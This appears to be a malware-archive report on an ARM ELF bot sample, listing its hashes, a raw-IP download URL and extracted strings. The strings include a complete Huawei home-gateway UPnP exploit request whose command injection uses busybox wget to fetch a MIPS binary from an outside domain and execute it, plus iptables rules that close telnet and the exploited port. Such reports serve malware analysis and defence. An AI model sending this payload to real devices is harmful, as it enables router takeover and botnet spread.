Warning! We are currently in recovery mode. The complete archive is not available.

Sample details: 2426000b4dd5b85ad4450557c2854155 --

Hashes
MD5: 2426000b4dd5b85ad4450557c2854155
SHA1: 94bf784f39e61d93fb2d4242cf6221a8c1c0bd41
SHA256: 1bbc0e79ef38f8631404819db95a82e74fbc2a87457791d4265c158e628a6be1
SSDEEP: 1536:itnOAgQZGDnOUcPApgcLARZvbuL71St/dV6iZIMiq2Q/VPe0L:CgZDO9P9cL0Za74tl2Q/VPeQ
Details
File Type: ELF
Yara Hits
Source
http://185.62.190.159/bins/arm6.idopoc
Strings
		POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g okay.gorillamc.party -l /tmp/ifipoc -r /bins/mips.idopoc; /bin/busybox chmod 777 * /tmp/ifipoc; /tmp/ifipoc huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
iptables -A INPUT -p tcp --destination-port 23 -j DROP
iptables -A INPUT -p tcp --destination-port 37215 -j DROP
*+)#0+XB
M$65&6SRS=
M$65&6SRS>B
B*+)#0+b
SPQVWT
/proc/stat
/proc/cpuinfo
processor
/sys/devices/system/cpu
/dev/null
/bin/sh
.shstrtab
.rodata
.init_array
.fini_array
.ARM.attributes